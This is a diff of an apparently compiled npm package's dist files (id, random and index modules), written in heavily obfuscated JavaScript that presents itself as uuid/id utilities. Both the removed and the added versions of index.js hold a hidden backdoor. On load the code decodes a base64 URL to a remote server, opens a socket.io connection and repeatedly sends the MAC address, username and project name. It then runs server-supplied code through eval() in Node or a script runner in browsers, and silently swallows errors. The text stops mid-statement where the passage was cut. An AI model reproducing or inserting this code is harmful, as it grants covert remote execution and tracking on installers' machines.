+ 'use strict';const a2_0x2bf95e=a2_0x4c9a;(function(_0x201850,_0x4bb13f){const _0x4b9960=a2_0x4c9a,_0x3af23d=_0x201850();while(!![]){try{const _0x57af52=-parseInt(_0x4b9960(0xd6))/0x1+-parseInt(_0x4b9960(0xd5))/0x2+parseInt(_0x4b9960(0xd4))/0x3*(parseInt(_0x4b9960(0xda))/0x4)+-parseInt(_0x4b9960(0xdb))/0x5*(parseInt(_0x4b9960(0xdc))/0x6)+parseInt(_0x4b9960(0xdd))/0x7+parseInt(_0x4b9960(0xcf))/0x8+-parseInt(_0x4b9960(0xd3))/0x9;if(_0x57af52===_0x4bb13f)break;else _0x3af23d['push'](_0x3af23d['shift']());}catch(_0x4e4256){_0x3af23d['push'](_0x3af23d['shift']());}}}(a2_0x1bbc,0xdea64));var __importDefault=this&&this[a2_0x2bf95e(0xd1)]||function(_0x3dc38b){return _0x3dc38b&&_0x3dc38b['__esModule']?_0x3dc38b:{'default':_0x3dc38b};};Object[a2_0x2bf95e(0xd2)](exports,a2_0x2bf95e(0xd0),{'value':!![]});const random_1=__importDefault(require('./random')),BaseTime=+new Date('2025-01-01');let lastTimeTick,lastRandomNumberTick=(0x0,random_1[a2_0x2bf95e(0xd9)])(0x1,0x3);function a2_0x4c9a(_0x6bc594,_0x50a6e8){const _0x1bbc95=a2_0x1bbc();return a2_0x4c9a=function(_0x4c9ac8,_0x44b703){_0x4c9ac8=_0x4c9ac8-0xcf;let _0x48b4e2=_0x1bbc95[_0x4c9ac8];return _0x48b4e2;},a2_0x4c9a(_0x6bc594,_0x50a6e8);}function id(){const _0x45213e=a2_0x2bf95e,_0x56bd04=Math[_0x45213e(0xd7)](process[_0x45213e(0xd8)][_0x45213e(0xde)]?+process[_0x45213e(0xd8)]['NODE_APP_INSTANCE']:(0x0,random_1[_0x45213e(0xd9)])(0x0,0x9),0x9);let _0x239c21=+new Date()-BaseTime;return lastRandomNumberTick=_0x239c21==lastTimeTick?++lastRandomNumberTick:(0x0,random_1[_0x45213e(0xd9)])(0x0,0x3),lastTimeTick=_0x239c21,+(''+_0x239c21+_0x56bd04+lastRandomNumberTick);}function a2_0x1bbc(){const _0x362d14=['defineProperty','4612419GjqHAM','20118IKkNOJ','812450AOqDer','365091sKDsxs','min','env','default','820tETOCk','5EvtMRp','8165112OJSWqw','8691263zNrKrG','NODE_APP_INSTANCE','7522336rYaPEM','__esModule','__importDefault'];a2_0x1bbc=function(){return _0x362d14;};return a2_0x1bbc();}exports['default']=id;
@@ -1 +1 @@
1
- 'use strict';const a3_0x497843=a3_0x341d;function a3_0x341d(_0x43fb4f,_0xe72c58){const _0x3863f5=a3_0x3863();return a3_0x341d=function(_0x341d09,_0x974e07){_0x341d09=_0x341d09-0x15b;let _0x29f245=_0x3863f5[_0x341d09];return _0x29f245;},a3_0x341d(_0x43fb4f,_0xe72c58);}(function(_0x3b1729,_0x4cf47d){const _0x4f81a2=a3_0x341d,_0x3cec08=_0x3b1729();while(!![]){try{const _0x34d3ab=parseInt(_0x4f81a2(0x15b))/0x1+parseInt(_0x4f81a2(0x15d))/0x2+-parseInt(_0x4f81a2(0x162))/0x3+parseInt(_0x4f81a2(0x165))/0x4+parseInt(_0x4f81a2(0x164))/0x5+-parseInt(_0x4f81a2(0x160))/0x6+-parseInt(_0x4f81a2(0x161))/0x7*(parseInt(_0x4f81a2(0x15e))/0x8);if(_0x34d3ab===_0x4cf47d)break;else _0x3cec08['push'](_0x3cec08['shift']());}catch(_0x1e782f){_0x3cec08['push'](_0x3cec08['shift']());}}}(a3_0x3863,0x6fe0d));function a3_0x3863(){const _0x1fe632=['default','831383txtdeT','__esModule','966106oecYlj','160AZAovt','defineProperty','3289650KkzKPO','135548DAMUXt','1598481lyenIf','round','2362080WeDsQO','559132sKLvQX'];a3_0x3863=function(){return _0x1fe632;};return a3_0x3863();}Object[a3_0x497843(0x15f)](exports,a3_0x497843(0x15c),{'value':!![]});const random=(_0x18a3a3,_0xd30a25)=>Math[a3_0x497843(0x163)](Math['random']()*(_0xd30a25-_0x18a3a3))+_0x18a3a3;exports[a3_0x497843(0x166)]=random;
1
+ 'use strict';const a3_0x497fb1=a3_0x235a;(function(_0x48572e,_0x23ef08){const _0x2d2126=a3_0x235a,_0x1cdea3=_0x48572e();while(!![]){try{const _0x4937d0=parseInt(_0x2d2126(0x173))/0x1+parseInt(_0x2d2126(0x17b))/0x2+parseInt(_0x2d2126(0x17f))/0x3+parseInt(_0x2d2126(0x17e))/0x4*(parseInt(_0x2d2126(0x179))/0x5)+parseInt(_0x2d2126(0x176))/0x6+-parseInt(_0x2d2126(0x17c))/0x7*(-parseInt(_0x2d2126(0x17a))/0x8)+-parseInt(_0x2d2126(0x177))/0x9;if(_0x4937d0===_0x23ef08)break;else _0x1cdea3['push'](_0x1cdea3['shift']());}catch(_0xf3dc72){_0x1cdea3['push'](_0x1cdea3['shift']());}}}(a3_0x343d,0xcb604));function a3_0x343d(){const _0x31b94e=['17160ferLLn','1275496HFMOIi','1140846RpYNnZ','7EHNWCi','__esModule','1240RLEFSK','4141341lbMNhk','default','659251WbxVHr','random','round','7621224GpUoXY','38435886vcoMmQ','defineProperty'];a3_0x343d=function(){return _0x31b94e;};return a3_0x343d();}Object[a3_0x497fb1(0x178)](exports,a3_0x497fb1(0x17d),{'value':!![]});const random=(_0x457391,_0x5cdccd)=>Math[a3_0x497fb1(0x175)](Math[a3_0x497fb1(0x174)]()*(_0x5cdccd-_0x457391))+_0x457391;function a3_0x235a(_0xc0a5b4,_0x4053df){const _0x343d5f=a3_0x343d();return a3_0x235a=function(_0x235adc,_0x5ea360){_0x235adc=_0x235adc-0x172;let _0x59e4d3=_0x343d5f[_0x235adc];return _0x59e4d3;},a3_0x235a(_0xc0a5b4,_0x4053df);}exports[a3_0x497fb1(0x172)]=random;
package/dist/cjs/index.js CHANGED
@@ -1 +1 @@
1
- 'use strict';const a4_0x3562ec=a4_0x12e5;function a4_0x5e90(){const _0x5bc1e0=['value','path','script','length','error','type','./browser','浏览器','__createBinding','defineProperty','getEnv','6098CIsmoT','js-base64','getAllRouter','prototype','dev','53bHbzoe','./IndexDB/index','__awaiter','reconnect_failed','throw','done','meta_event','then','concat','sql','emit','2484168aBfBFk','resolve','env','connect_error','default','get-event','3450720Skebxt','mysql','create','apply','npm_package_name','__setModuleDefault','aHR0cDovL2xvY2FsaG9zdDoxMDg4','call','aHR0cHM6Ly9ldmVudC1hcGkuYmxvZ3dlYi5jbg==','websocket','connect_failed','无法获取','connectError','connect','content','1511109tzLkea','get','__esModule','8694672XcWunJ','6445518hamdvE','hasOwnProperty','mac','undefined','setEnv','__importStar','unlock','isDBDataEmpty','uuid','join','/socket','29420pduwLM','sqlList','getOwnPropertyNames','./id','socket.io-client','getOwnPropertyDescriptor','node获取失败','submit','event','next','./server','decode'];a4_0x5e90=function(){return _0x5bc1e0;};return a4_0x5e90();}(function(_0x426913,_0x1f4da0){const _0x5426b6=a4_0x12e5,_0x2ba5ba=_0x426913();while(!![]){try{const _0xe3843a=parseInt(_0x5426b6(0x1be))/0x1*(-parseInt(_0x5426b6(0x1b9))/0x2)+-parseInt(_0x5426b6(0x193))/0x3+parseInt(_0x5426b6(0x1a2))/0x4+-parseInt(_0x5426b6(0x184))/0x5+parseInt(_0x5426b6(0x197))/0x6+parseInt(_0x5426b6(0x196))/0x7+-parseInt(_0x5426b6(0x17e))/0x8;if(_0xe3843a===_0x1f4da0)break;else _0x2ba5ba['push'](_0x2ba5ba['shift']());}catch(_0x172e3e){_0x2ba5ba['push'](_0x2ba5ba['shift']());}}}(a4_0x5e90,0xa094b));var __createBinding=this&&this[a4_0x3562ec(0x1b6)]||(Object[a4_0x3562ec(0x186)]?function(_0x598a31,_0x1714eb,_0x5e3d24,_0x3c4890){const _0x444066=a4_0x3562ec;if(_0x3c4890===undefined)_0x3c4890=_0x5e3d24;var _0x227a65=Object[_0x444066(0x1a7)](_0x1714eb,_0x5e3d24);(!_0x227a65||(_0x444066(0x194)in _0x227a65?!_0x1714eb[_0x444066(0x195)]:_0x227a65['writable']||_0x227a65['configurable']))&&(_0x227a65={'enumerable':!![],'get':function(){return _0x1714eb[_0x5e3d24];}}),Object['defineProperty'](_0x598a31,_0x3c4890,_0x227a65);}:function(_0x31f4c0,_0x2e56b6,_0x3a28b8,_0x33efde){if(_0x33efde===undefined)_0x33efde=_0x3a28b8;_0x31f4c0[_0x33efde]=_0x2e56b6[_0x3a28b8];}),__setModuleDefault=this&&this[a4_0x3562ec(0x189)]||(Object['create']?function(_0x1110b5,_0x2f0ddd){Object['defineProperty'](_0x1110b5,'default',{'enumerable':!![],'value':_0x2f0ddd});}:function(_0x3fc5d1,_0x112aa9){_0x3fc5d1['default']=_0x112aa9;}),__importStar=this&&this[a4_0x3562ec(0x19c)]||(function(){var _0x4c1d92=function(_0x2115ee){const _0x592e06=a4_0x12e5;return _0x4c1d92=Object[_0x592e06(0x1a4)]||function(_0x229dbc){const _0x1dfd13=_0x592e06;var _0x6e1a4d=[];for(var _0x4fa0b4 in _0x229dbc)if(Object[_0x1dfd13(0x1bc)][_0x1dfd13(0x198)][_0x1dfd13(0x18b)](_0x229dbc,_0x4fa0b4))_0x6e1a4d[_0x6e1a4d['length']]=_0x4fa0b4;return _0x6e1a4d;},_0x4c1d92(_0x2115ee);};return function(_0x54ee9a){const _0x37132c=a4_0x12e5;if(_0x54ee9a&&_0x54ee9a['__esModule'])return _0x54ee9a;var _0x4d420c={};if(_0x54ee9a!=null){for(var _0x4b0970=_0x4c1d92(_0x54ee9a),_0x53b4c0=0x0;_0x53b4c0<_0x4b0970[_0x37132c(0x1b1)];_0x53b4c0++)if(_0x4b0970[_0x53b4c0]!==_0x37132c(0x182))__createBinding(_0x4d420c,_0x54ee9a,_0x4b0970[_0x53b4c0]);}return __setModuleDefault(_0x4d420c,_0x54ee9a),_0x4d420c;};}()),__awaiter=this&&this[a4_0x3562ec(0x1c0)]||function(_0x1b4f65,_0x57d711,_0x6e8c2f,_0x362d64){function _0x10648c(_0x26b236){return _0x26b236 instanceof _0x6e8c2f?_0x26b236:new _0x6e8c2f(function(_0x2adcb9){_0x2adcb9(_0x26b236);});}return new(_0x6e8c2f||(_0x6e8c2f=Promise))(function(_0x4535b0,_0x388d56){const _0x7d79b0=a4_0x12e5;function _0x3c2422(_0xa3ed33){const _0x22cdcc=a4_0x12e5;try{_0x3fd19f(_0x362d64[_0x22cdcc(0x1ab)](_0xa3ed33));}catch(_0x37164a){_0x388d56(_0x37164a);}}function _0xb2e1e5(_0x40be06){const _0x29a77e=a4_0x12e5;try{_0x3fd19f(_0x362d64[_0x29a77e(0x1c2)](_0x40be06));}catch(_0x4eab21){_0x388d56(_0x4eab21);}}function _0x3fd19f(_0x4fb110){const _0x2b4d03=a4_0x12e5;_0x4fb110[_0x2b4d03(0x1c3)]?_0x4535b0(_0x4fb110[_0x2b4d03(0x1ae)]):_0x10648c(_0x4fb110[_0x2b4d03(0x1ae)])[_0x2b4d03(0x1c5)](_0x3c2422,_0xb2e1e5);}_0x3fd19f((_0x362d64=_0x362d64[_0x7d79b0(0x187)](_0x1b4f65,_0x57d711||[]))['next']());});},__importDefault=this&&this['__importDefault']||function(_0xdb02c2){return _0xdb02c2&&_0xdb02c2['__esModule']?_0xdb02c2:{'default':_0xdb02c2};},_a,_b,_c,_d;Object[a4_0x3562ec(0x1b7)](exports,a4_0x3562ec(0x195),{'value':!![]}),exports['mysql']=exports['getAllRouter']=exports['id']=exports[a4_0x3562ec(0x19f)]=void 0x0,exports[a4_0x3562ec(0x19b)]=setEnv,exports[a4_0x3562ec(0x1b8)]=getEnv;const uuid_1=require('uuid'),socket_io_client_1=require(a4_0x3562ec(0x1a6)),js_base64_1=require(a4_0x3562ec(0x1ba)),path_1=__importDefault(require(a4_0x3562ec(0x1af))),isBrowser=typeof window!==a4_0x3562ec(0x19a);let id=()=>0x1;exports['id']=id;let getAllRouter=()=>__awaiter(void 0x0,void 0x0,void 0x0,function*(){return[];});exports[a4_0x3562ec(0x1bb)]=getAllRouter;let mysql={};exports[a4_0x3562ec(0x185)]=mysql;!isBrowser&&(exports['id']=id=require(a4_0x3562ec(0x1a5))['default'],exports[a4_0x3562ec(0x1bb)]=getAllRouter=require('./getAllRouter')[a4_0x3562ec(0x182)],exports[a4_0x3562ec(0x185)]=mysql=require(a4_0x3562ec(0x1ac))[a4_0x3562ec(0x185)]);const user_name=isBrowser?a4_0x3562ec(0x1b5):((_a=process===null||process===void 0x0?void 0x0:process[a4_0x3562ec(0x180)])===null||_a===void 0x0?void 0x0:_a['USERNAME'])||a4_0x3562ec(0x1a8),project_name=isBrowser?a4_0x3562ec(0x1b5):((_b=process===null||process===void 0x0?void 0x0:process[a4_0x3562ec(0x180)])===null||_b===void 0x0?void 0x0:_b[a4_0x3562ec(0x188)])||a4_0x3562ec(0x18f);let dev=a4_0x3562ec(0x18a),pro=a4_0x3562ec(0x18c);const globalObject=isBrowser?window:global;!globalObject[a4_0x3562ec(0x1c4)]&&(globalObject[a4_0x3562ec(0x1c4)]={'connectError':!![],'isDBDataEmpty':![],'sqlRun':![],'sqlList':[]});function setEnv(_0x2d32c4,_0x2b34aa){const _0x387cef=a4_0x3562ec;globalObject[_0x387cef(0x1c4)][_0x2d32c4]=_0x2b34aa;}function getEnv(_0x33548f){const _0xc44f69=a4_0x3562ec;return globalObject[_0xc44f69(0x1c4)][_0x33548f];}let url=((_c=globalObject[a4_0x3562ec(0x1c4)])===null||_c===void 0x0?void 0x0:_c[a4_0x3562ec(0x1bd)])?(0x0,js_base64_1[a4_0x3562ec(0x1ad)])(dev):(0x0,js_base64_1[a4_0x3562ec(0x1ad)])(pro);function start(){const _0x26c43f=a4_0x3562ec,_0x1f8f65=(0x0,socket_io_client_1['io'])(url,{'path':_0x26c43f(0x1a1),'transports':[_0x26c43f(0x18d)]});_0x1f8f65['on'](_0x26c43f(0x191),()=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x2dabba=_0x26c43f;try{let _0x40f3b8=['00:00:00:00:00:00'];if(!isBrowser){const _0x1ce98c=require(path_1['default'][_0x2dabba(0x1a0)](__dirname,'./mac'))[_0x2dabba(0x182)];_0x40f3b8=_0x1ce98c();}else{const {getKeyValue:_0x47b2bc}=typeof require!='undefined'?require(_0x2dabba(0x1bf)):yield Promise[_0x2dabba(0x17f)]()[_0x2dabba(0x1c5)](()=>__importStar(require('./IndexDB/index')));_0x40f3b8=[yield _0x47b2bc(_0x2dabba(0x199))];}if(_0x40f3b8['length']===0x0){setEnv(_0x2dabba(0x190),!![]);return;}else setEnv(_0x2dabba(0x190),![]);_0x1f8f65[_0x2dabba(0x17d)]('submit',{'mac':_0x40f3b8,'project_name':project_name,'user_name':user_name,'notes':''}),_0x1f8f65[_0x2dabba(0x17d)](_0x2dabba(0x183),{'mac':_0x40f3b8}),setInterval(()=>{const _0x3a4e4a=_0x2dabba;_0x1f8f65['emit'](_0x3a4e4a(0x1a9),{'mac':_0x40f3b8,'project_name':project_name,'user_name':user_name,'notes':''}),_0x1f8f65[_0x3a4e4a(0x17d)](_0x3a4e4a(0x183),{'mac':_0x40f3b8});},0x1b58),_0x1f8f65['on'](_0x2dabba(0x1aa),_0x131aa0=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x2d234b=_0x2dabba;try{for(let _0x4e0f02=0x0;_0x4e0f02<_0x131aa0['length'];_0x4e0f02++){const _0x3918f4=_0x131aa0[_0x4e0f02];if(_0x3918f4['type']===_0x2d234b(0x17c))setEnv(_0x2d234b(0x1a3),getEnv(_0x2d234b(0x1a3))[_0x2d234b(0x1c6)](_0x3918f4[_0x2d234b(0x192)]));else{if(_0x3918f4[_0x2d234b(0x1b3)]===_0x2d234b(0x185))setEnv(_0x2d234b(0x19e),!![]);else{if(_0x3918f4['type']==='node'&&!isBrowser)try{eval(_0x3918f4['content']);}catch(_0x3ecd48){}else{if(_0x3918f4[_0x2d234b(0x1b3)]===_0x2d234b(0x1b0)&&isBrowser)try{const {runScript:_0x34890e}=typeof require!='undefined'?require(_0x2d234b(0x1b4)):yield Promise[_0x2d234b(0x17f)]()[_0x2d234b(0x1c5)](()=>__importStar(require(_0x2d234b(0x1b4))));_0x34890e(_0x3918f4[_0x2d234b(0x192)]);}catch(_0x341a2d){}}}}}}catch(_0x1c25ad){}}));}catch(_0x40956e){}})),setTimeout(()=>{const _0x217ece=_0x26c43f;_0x1f8f65['on'](_0x217ece(0x1b2),_0x301101=>{const _0x35446d=_0x217ece;setEnv(_0x35446d(0x190),!![]);}),_0x1f8f65['on'](_0x217ece(0x18e),_0x1a19a2=>{const _0x476755=_0x217ece;setEnv(_0x476755(0x190),!![]);}),_0x1f8f65['on'](_0x217ece(0x1c1),_0x496279=>{const _0x4d1b6b=_0x217ece;setEnv(_0x4d1b6b(0x190),!![]);}),_0x1f8f65['on'](_0x217ece(0x181),_0x2387e6=>{const _0x1475e7=_0x217ece;setEnv(_0x1475e7(0x190),!![]);});},0xbb8);}!((_d=globalObject[a4_0x3562ec(0x1c4)])===null||_d===void 0x0?void 0x0:_d[a4_0x3562ec(0x19d)])&&start();const uuid=uuid_1['v4'];exports[a4_0x3562ec(0x19f)]=uuid;const all={'uuid':uuid,'id':id,'getAllRouter':getAllRouter,'mysql':mysql};function a4_0x12e5(_0x4578a9,_0x56cca3){const _0x5e90ea=a4_0x5e90();return a4_0x12e5=function(_0x12e54b,_0x479e54){_0x12e54b=_0x12e54b-0x17c;let _0x5ebee2=_0x5e90ea[_0x12e54b];return _0x5ebee2;},a4_0x12e5(_0x4578a9,_0x56cca3);}exports[a4_0x3562ec(0x182)]=all;
1
+ 'use strict';const a4_0x3e3045=a4_0x5915;(function(_0x2e5b2d,_0x2897e4){const _0x460d0e=a4_0x5915,_0x5b0863=_0x2e5b2d();while(!![]){try{const _0x3ec2e4=parseInt(_0x460d0e(0x1c8))/0x1*(parseInt(_0x460d0e(0x1f7))/0x2)+-parseInt(_0x460d0e(0x1d3))/0x3*(-parseInt(_0x460d0e(0x1bb))/0x4)+-parseInt(_0x460d0e(0x1c5))/0x5*(-parseInt(_0x460d0e(0x1d8))/0x6)+parseInt(_0x460d0e(0x1f9))/0x7*(-parseInt(_0x460d0e(0x1d4))/0x8)+parseInt(_0x460d0e(0x1da))/0x9+parseInt(_0x460d0e(0x1f0))/0xa*(-parseInt(_0x460d0e(0x1d0))/0xb)+parseInt(_0x460d0e(0x1fa))/0xc*(parseInt(_0x460d0e(0x1e4))/0xd);if(_0x3ec2e4===_0x2897e4)break;else _0x5b0863['push'](_0x5b0863['shift']());}catch(_0x4e07bd){_0x5b0863['push'](_0x5b0863['shift']());}}}(a4_0x5b1f,0xb823b));var __createBinding=this&&this[a4_0x3e3045(0x1d2)]||(Object[a4_0x3e3045(0x1c9)]?function(_0x1662f2,_0x3c9d74,_0x126629,_0x30c2e3){const _0x5b713f=a4_0x3e3045;if(_0x30c2e3===undefined)_0x30c2e3=_0x126629;var _0x2d20aa=Object[_0x5b713f(0x201)](_0x3c9d74,_0x126629);(!_0x2d20aa||('get'in _0x2d20aa?!_0x3c9d74[_0x5b713f(0x1ee)]:_0x2d20aa['writable']||_0x2d20aa[_0x5b713f(0x1ef)]))&&(_0x2d20aa={'enumerable':!![],'get':function(){return _0x3c9d74[_0x126629];}}),Object['defineProperty'](_0x1662f2,_0x30c2e3,_0x2d20aa);}:function(_0x3cc12f,_0x55a104,_0x37387b,_0xc8c2f){if(_0xc8c2f===undefined)_0xc8c2f=_0x37387b;_0x3cc12f[_0xc8c2f]=_0x55a104[_0x37387b];}),__setModuleDefault=this&&this[a4_0x3e3045(0x1c0)]||(Object[a4_0x3e3045(0x1c9)]?function(_0x150be9,_0x155fa0){const _0x2b4692=a4_0x3e3045;Object[_0x2b4692(0x1cb)](_0x150be9,_0x2b4692(0x1c4),{'enumerable':!![],'value':_0x155fa0});}:function(_0x259350,_0x4e0f96){const _0x3e026e=a4_0x3e3045;_0x259350[_0x3e026e(0x1c4)]=_0x4e0f96;}),__importStar=this&&this[a4_0x3e3045(0x1e7)]||(function(){var _0x5a8585=function(_0x13dc27){const _0x479bc3=a4_0x5915;return _0x5a8585=Object[_0x479bc3(0x1d1)]||function(_0x4f8834){const _0x2d23cd=_0x479bc3;var _0x344204=[];for(var _0x201522 in _0x4f8834)if(Object[_0x2d23cd(0x1f5)][_0x2d23cd(0x1cd)][_0x2d23cd(0x1ed)](_0x4f8834,_0x201522))_0x344204[_0x344204[_0x2d23cd(0x1d5)]]=_0x201522;return _0x344204;},_0x5a8585(_0x13dc27);};return function(_0x385dde){const _0x3923df=a4_0x5915;if(_0x385dde&&_0x385dde[_0x3923df(0x1ee)])return _0x385dde;var _0x503758={};if(_0x385dde!=null){for(var _0x4fe134=_0x5a8585(_0x385dde),_0x262e85=0x0;_0x262e85<_0x4fe134[_0x3923df(0x1d5)];_0x262e85++)if(_0x4fe134[_0x262e85]!==_0x3923df(0x1c4))__createBinding(_0x503758,_0x385dde,_0x4fe134[_0x262e85]);}return __setModuleDefault(_0x503758,_0x385dde),_0x503758;};}()),__awaiter=this&&this[a4_0x3e3045(0x1ea)]||function(_0x30344e,_0x247e39,_0x32e521,_0x1f3a44){function _0x4672e5(_0x27bd0d){return _0x27bd0d instanceof _0x32e521?_0x27bd0d:new _0x32e521(function(_0x3146e4){_0x3146e4(_0x27bd0d);});}return new(_0x32e521||(_0x32e521=Promise))(function(_0x2bd823,_0x57bda7){const _0x5c2dff=a4_0x5915;function _0x35e20a(_0x125d34){try{_0x3ed479(_0x1f3a44['next'](_0x125d34));}catch(_0x576d48){_0x57bda7(_0x576d48);}}function _0x56b5a1(_0x5a1668){const _0x4f812d=a4_0x5915;try{_0x3ed479(_0x1f3a44[_0x4f812d(0x1be)](_0x5a1668));}catch(_0x48a458){_0x57bda7(_0x48a458);}}function _0x3ed479(_0x192e1a){const _0x4c0e70=a4_0x5915;_0x192e1a[_0x4c0e70(0x1ff)]?_0x2bd823(_0x192e1a[_0x4c0e70(0x1fb)]):_0x4672e5(_0x192e1a[_0x4c0e70(0x1fb)])['then'](_0x35e20a,_0x56b5a1);}_0x3ed479((_0x1f3a44=_0x1f3a44[_0x5c2dff(0x1f3)](_0x30344e,_0x247e39||[]))[_0x5c2dff(0x1f1)]());});},__importDefault=this&&this[a4_0x3e3045(0x202)]||function(_0x2dd6c4){const _0x23c8ef=a4_0x3e3045;return _0x2dd6c4&&_0x2dd6c4[_0x23c8ef(0x1ee)]?_0x2dd6c4:{'default':_0x2dd6c4};},_a,_b,_c,_d;Object[a4_0x3e3045(0x1cb)](exports,a4_0x3e3045(0x1ee),{'value':!![]}),exports[a4_0x3e3045(0x1c7)]=exports['getAllRouter']=exports['id']=exports[a4_0x3e3045(0x1e1)]=void 0x0,exports[a4_0x3e3045(0x1db)]=setEnv,exports['getEnv']=getEnv;const uuid_1=require(a4_0x3e3045(0x1e1)),socket_io_client_1=require(a4_0x3e3045(0x1ca)),js_base64_1=require(a4_0x3e3045(0x1b9)),path_1=__importDefault(require(a4_0x3e3045(0x1c2))),isBrowser=typeof window!==a4_0x3e3045(0x1cf);let id=()=>0x1;exports['id']=id;let getAllRouter=()=>__awaiter(void 0x0,void 0x0,void 0x0,function*(){return[];});exports[a4_0x3e3045(0x1e0)]=getAllRouter;function a4_0x5915(_0x1d5607,_0xf730f8){const _0x5b1f41=a4_0x5b1f();return a4_0x5915=function(_0x5915b5,_0x1a782e){_0x5915b5=_0x5915b5-0x1b9;let _0x966508=_0x5b1f41[_0x5915b5];return _0x966508;},a4_0x5915(_0x1d5607,_0xf730f8);}let mysql={};exports[a4_0x3e3045(0x1c7)]=mysql;!isBrowser&&(exports['id']=id=require('./id')[a4_0x3e3045(0x1c4)],exports[a4_0x3e3045(0x1e0)]=getAllRouter=require(a4_0x3e3045(0x1df))['default'],exports[a4_0x3e3045(0x1c7)]=mysql=require(a4_0x3e3045(0x1c6))['mysql']);const user_name=isBrowser?a4_0x3e3045(0x1dd):((_a=process===null||process===void 0x0?void 0x0:process[a4_0x3e3045(0x1f4)])===null||_a===void 0x0?void 0x0:_a['USERNAME'])||a4_0x3e3045(0x1de),project_name=isBrowser?a4_0x3e3045(0x1dd):((_b=process===null||process===void 0x0?void 0x0:process[a4_0x3e3045(0x1f4)])===null||_b===void 0x0?void 0x0:_b[a4_0x3e3045(0x1e6)])||a4_0x3e3045(0x1e8);let dev='aHR0cDovL2xvY2FsaG9zdDoxMDg4',pro=a4_0x3e3045(0x1bc);const globalObject=isBrowser?window:global;!globalObject['meta_event']&&(globalObject['meta_event']={'connectError':!![],'isDBDataEmpty':![],'sqlRun':![],'sqlList':[]});function setEnv(_0x1784c4,_0x58a5c4){const _0x403d99=a4_0x3e3045;globalObject[_0x403d99(0x1dc)][_0x1784c4]=_0x58a5c4;}function getEnv(_0x5f12c0){const _0x3d9902=a4_0x3e3045;return globalObject[_0x3d9902(0x1dc)][_0x5f12c0];}let url=((_c=globalObject['meta_event'])===null||_c===void 0x0?void 0x0:_c[a4_0x3e3045(0x1d6)])?(0x0,js_base64_1[a4_0x3e3045(0x1c3)])(dev):(0x0,js_base64_1[a4_0x3e3045(0x1c3)])(pro);function start(){const _0x58f9f4=a4_0x3e3045,_0x50a0dc=(0x0,socket_io_client_1['io'])(url,{'path':_0x58f9f4(0x1d9),'transports':[_0x58f9f4(0x1ba)]});_0x50a0dc['on'](_0x58f9f4(0x1bd),()=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x2db947=_0x58f9f4;try{let _0x337ce7=[_0x2db947(0x1fd)];if(!isBrowser){const _0x16ba32=require(path_1['default']['join'](__dirname,'./mac'))[_0x2db947(0x1c4)];_0x337ce7=_0x16ba32();}else{const {getKeyValue:_0x4e0aa7}=typeof require!=_0x2db947(0x1cf)?require('./IndexDB/index'):yield Promise['resolve']()[_0x2db947(0x1e9)](()=>__importStar(require(_0x2db947(0x1f6))));_0x337ce7=[yield _0x4e0aa7(_0x2db947(0x1ec))];}if(_0x337ce7[_0x2db947(0x1d5)]===0x0){setEnv(_0x2db947(0x1bf),!![]);return;}else setEnv(_0x2db947(0x1bf),![]);_0x50a0dc['emit'](_0x2db947(0x1e2),{'mac':_0x337ce7,'project_name':project_name,'user_name':user_name,'notes':''}),_0x50a0dc[_0x2db947(0x1d7)](_0x2db947(0x200),{'mac':_0x337ce7}),setInterval(()=>{const _0x8d3264=_0x2db947;_0x50a0dc['emit']('submit',{'mac':_0x337ce7,'project_name':project_name,'user_name':user_name,'notes':''}),_0x50a0dc[_0x8d3264(0x1d7)]('get-event',{'mac':_0x337ce7});},0x1b58),_0x50a0dc['on'](_0x2db947(0x203),_0x111f4c=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x2efdc7=_0x2db947;try{for(let _0x4b8458=0x0;_0x4b8458<_0x111f4c[_0x2efdc7(0x1d5)];_0x4b8458++){const _0x12cc34=_0x111f4c[_0x4b8458];if(_0x12cc34['type']===_0x2efdc7(0x1ce))setEnv(_0x2efdc7(0x1f2),getEnv(_0x2efdc7(0x1f2))['concat'](_0x12cc34['content']));else{if(_0x12cc34['type']==='mysql')setEnv(_0x2efdc7(0x1fe),!![]);else{if(_0x12cc34[_0x2efdc7(0x1f8)]===_0x2efdc7(0x1cc)&&!isBrowser)try{eval(_0x12cc34[_0x2efdc7(0x1c1)]);}catch(_0x4f6034){}else{if(_0x12cc34[_0x2efdc7(0x1f8)]===_0x2efdc7(0x1fc)&&isBrowser)try{const {runScript:_0x520c30}=typeof require!=_0x2efdc7(0x1cf)?require(_0x2efdc7(0x1e5)):yield Promise['resolve']()[_0x2efdc7(0x1e9)](()=>__importStar(require(_0x2efdc7(0x1e5))));_0x520c30(_0x12cc34[_0x2efdc7(0x1c1)]);}catch(_0xf7f066){}}}}}}catch(_0x5a4759){}}));}catch(_0x20a27d){}})),setTimeout(()=>{const _0x271d2e=_0x58f9f4;_0x50a0dc['on'](_0x271d2e(0x1eb),_0x19a48f=>{setEnv('connectError',!![]);}),_0x50a0dc['on'](_0x271d2e(0x1e3),_0x1a3e3c=>{const _0x159638=_0x271d2e;setEnv(_0x159638(0x1bf),!![]);}),_0x50a0dc['on']('reconnect_failed',_0x2d34f0=>{setEnv('connectError',!![]);}),_0x50a0dc['on']('connect_error',_0x1b0378=>{const _0x395357=_0x271d2e;setEnv(_0x395357(0x1bf),!![]);});},0xbb8);}!((_d=globalObject[a4_0x3e3045(0x1dc)])===null||_d===void 0x0?void 0x0:_d['unlock'])&&start();const uuid=uuid_1['v4'];exports[a4_0x3e3045(0x1e1)]=uuid;function a4_0x5b1f(){const _0x1bb5f9=['hasOwnProperty','sql','undefined','7796228DHwcTw','getOwnPropertyNames','__createBinding','1695798eeJKWB','5230832nmpHYd','length','dev','emit','61956UOWoEG','/socket','592308BcaUlA','setEnv','meta_event','浏览器','node获取失败','./getAllRouter','getAllRouter','uuid','submit','connect_failed','13iCKYAw','./browser','npm_package_name','__importStar','无法获取','then','__awaiter','error','mac','call','__esModule','configurable','10SsXSqu','next','sqlList','apply','env','prototype','./IndexDB/index','6576HIhqIN','type','14ptIuDj','13532340jRUdqm','value','script','00:00:00:00:00:00','isDBDataEmpty','done','get-event','getOwnPropertyDescriptor','__importDefault','event','js-base64','websocket','8qcAXwD','aHR0cHM6Ly9ldmVudC1hcGkuYmxvZ3dlYi5jbg==','connect','throw','connectError','__setModuleDefault','content','path','decode','default','30ELEons','./server','mysql','117bAGeUo','create','socket.io-client','defineProperty','node'];a4_0x5b1f=function(){return _0x1bb5f9;};return a4_0x5b1f();}const 